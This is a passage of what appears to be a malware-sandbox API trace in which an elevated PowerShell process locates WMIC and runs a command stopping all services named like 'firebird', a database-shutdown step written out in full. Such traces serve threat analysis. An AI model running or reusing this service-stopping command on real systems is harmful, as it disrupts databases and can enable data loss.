lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.214] SetErrorMode (uMode=0x1) returned 0x1 [0249.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.214] SetErrorMode (uMode=0x1) returned 0x1 [0249.214] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.215] SetErrorMode (uMode=0x1) returned 0x1 [0249.215] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.215] SetErrorMode (uMode=0x1) returned 0x1 [0249.215] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.215] SetErrorMode (uMode=0x1) returned 0x1 [0249.216] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.216] SetErrorMode (uMode=0x1) returned 0x1 [0249.216] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.216] SetErrorMode (uMode=0x1) returned 0x1 [0249.216] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.217] SetErrorMode (uMode=0x1) returned 0x1 [0249.217] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.217] SetErrorMode (uMode=0x1) returned 0x1 [0249.217] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.218] SetErrorMode (uMode=0x1) returned 0x1 [0249.218] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.218] SetErrorMode (uMode=0x1) returned 0x1 [0249.218] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.218] SetErrorMode (uMode=0x1) returned 0x1 [0249.218] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.219] SetErrorMode (uMode=0x1) returned 0x1 [0249.219] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.219] SetErrorMode (uMode=0x1) returned 0x1 [0249.219] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.220] SetErrorMode (uMode=0x1) returned 0x1 [0249.220] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.220] SetErrorMode (uMode=0x1) returned 0x1 [0249.220] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.220] SetErrorMode (uMode=0x1) returned 0x1 [0249.220] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.221] SetErrorMode (uMode=0x1) returned 0x1 [0249.221] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.221] SetErrorMode (uMode=0x1) returned 0x1 [0249.221] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.221] SetErrorMode (uMode=0x1) returned 0x1 [0249.222] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.222] SetErrorMode (uMode=0x1) returned 0x1 [0249.222] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.222] SetErrorMode (uMode=0x1) returned 0x1 [0249.222] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.223] SetErrorMode (uMode=0x1) returned 0x1 [0249.223] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.223] SetErrorMode (uMode=0x1) returned 0x1 [0249.223] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.223] SetErrorMode (uMode=0x1) returned 0x1 [0249.224] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.224] SetErrorMode (uMode=0x1) returned 0x1 [0249.224] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.224] SetErrorMode (uMode=0x1) returned 0x1 [0249.224] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.225] SetErrorMode (uMode=0x1) returned 0x1 [0249.225] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.225] SetErrorMode (uMode=0x1) returned 0x1 [0249.225] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.225] SetErrorMode (uMode=0x1) returned 0x1 [0249.225] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.226] SetErrorMode (uMode=0x1) returned 0x1 [0249.226] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0249.226] SetErrorMode (uMode=0x1) returned 0x1 [0249.226] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.226] SetErrorMode (uMode=0x1) returned 0x1 [0249.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0249.227] SetErrorMode (uMode=0x1) returned 0x1 [0249.227] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.227] SetErrorMode (uMode=0x1) returned 0x1 [0249.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0249.228] SetErrorMode (uMode=0x1) returned 0x1 [0249.229] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.229] SetErrorMode (uMode=0x1) returned 0x1 [0249.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0249.229] SetErrorMode (uMode=0x1) returned 0x1 [0249.230] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.230] SetErrorMode (uMode=0x1) returned 0x1 [0249.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0249.230] SetErrorMode (uMode=0x1) returned 0x1 [0249.230] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.231] SetErrorMode (uMode=0x1) returned 0x1 [0249.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0249.231] SetErrorMode (uMode=0x1) returned 0x1 [0249.231] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0249.232] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c9cd9f0 | out: lpFindFileData=0x1c9cd9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0249.232] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0249.232] SetErrorMode (uMode=0x1) returned 0x1 [0249.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c9cdb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0249.232] SetErrorMode (uMode=0x1) returned 0x1 [0249.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9cdd10 | out: lpFileInformation=0x1c9cdd10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0249.233] SetErrorMode (uMode=0x1) returned 0x1 [0249.233] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0249.233] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9cdef8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9cdef8) returned 0x4550 [0249.234] CoTaskMemFree (pv=0x1b9b1010) [0249.234] GetConsoleWindow () returned 0x5011e [0249.235] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0249.235] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.235] CoTaskMemFree (pv=0x2af7b0) [0249.235] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0249.235] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.235] CoTaskMemFree (pv=0x2af7b0) [0249.236] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%firebird%%'\" call stopservice", pNumArgs=0x1c9cdf40 | out: pNumArgs=0x1c9cdf40) returned 0x1ee760*="" [0249.236] lstrlenW (lpString="path") returned 4 [0249.236] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa7d0 [0249.236] RtlMoveMemory (in: Destination=0x1b9aa7d0, Source=0x1ee7a2, Length=0xa | out: Destination=0x1b9aa7d0) [0249.236] CoTaskMemFree (pv=0x1b9aa7d0) [0249.236] lstrlenW (lpString="Win32_Service") returned 13 [0249.236] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0249.236] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0249.236] CoTaskMemFree (pv=0x1b9b1010) [0249.236] lstrlenW (lpString="where") returned 5 [0249.236] CoTaskMemAlloc (cb=0xe) returned 0x1b9aa7d0 [0249.236] RtlMoveMemory (in: Destination=0x1b9aa7d0, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9aa7d0) [0249.236] CoTaskMemFree (pv=0x1b9aa7d0) [0249.236] lstrlenW (lpString="name like '%%firebird%%'") returned 24 [0249.236] CoTaskMemAlloc (cb=0x34) returned 0x1b9c7170 [0249.236] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x32 | out: Destination=0x1b9c7170) [0249.236] CoTaskMemFree (pv=0x1b9c7170) [0249.236] lstrlenW (lpString="call") returned 4 [0249.236] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa7d0 [0249.236] RtlMoveMemory (in: Destination=0x1b9aa7d0, Source=0x1ee806, Length=0xa | out: Destination=0x1b9aa7d0) [0249.236] CoTaskMemFree (pv=0x1b9aa7d0) [0249.237] lstrlenW (lpString="stopservice") returned 11 [0249.237] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0249.237] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee810, Length=0x18 | out: Destination=0x1b9b1010) [0249.237] CoTaskMemFree (pv=0x1b9b1010) [0249.237] LocalFree (hMem=0x1ee760) returned 0x0 [0249.237] CoTaskMemAlloc (cb=0x804) returned 0x1b9ded40 [0249.237] GetConsoleTitleW (in: lpConsoleTitle=0x1b9ded40, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0249.240] CoTaskMemFree (pv=0x1b9ded40) [0249.240] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0249.240] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c9cdea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31ccab0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice", lpProcessInformation=0x31ccab0*(hProcess=0x6c8, hThread=0x6c4, dwProcessId=0xb68, dwThreadId=0x2ac)) returned 1 [0249.244] CoTaskMemFree (pv=0x253f20) [0249.244] CloseHandle (hObject=0x6c4) returned 1 [0249.245] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0249.245] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9cdf48, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9cdf48) returned 0x4550 [0249.245] CoTaskMemFree (pv=0x1b9b1010) [0249.245] GetCurrentProcess () returned 0xffffffffffffffff [0249.245] GetCurrentProcess () returned 0xffffffffffffffff [0249.246] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9ce028, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9ce028*=0x6c4) returned 1 [0250.196] CloseHandle (hObject=0x6c4) returned 1 [0250.196] GetExitCodeProcess (in: hProcess=0x6c8, lpExitCode=0x1c9ce098 | out: lpExitCode=0x1c9ce098*=0x0) returned 1 [0250.196] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0250.197] CloseHandle (hObject=0x6c8) returned 1 [0250.198] SetEvent (hEvent=0x694) returned 1 [0250.198] SetEvent (hEvent=0x688) returned 1 [0250.198] SetEvent (hEvent=0x68c) returned 1 [0250.198] SetEvent (hEvent=0x690) returned 1 [0250.198] SetEvent (hEvent=0x6a4) returned 1 [0250.198] SetEvent (hEvent=0x698) returned 1 [0250.198] SetEvent (hEvent=0x69c) returned 1 [0250.198] SetEvent (hEvent=0x6a0) returned 1 [0250.198] SetEvent (hEvent=0x6a8) returned 1 [0250.199] CoUninitialize () Thread: id = 194 os_tid = 0xd4 [0250.232] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0250.234] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0250.235] VirtualQuery (in: lpAddress=0x1c90d780, lpBuffer=0x1c90e640, dwLength=0x30 | out: lpBuffer=0x1c90e640*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.237] VirtualQuery (in: 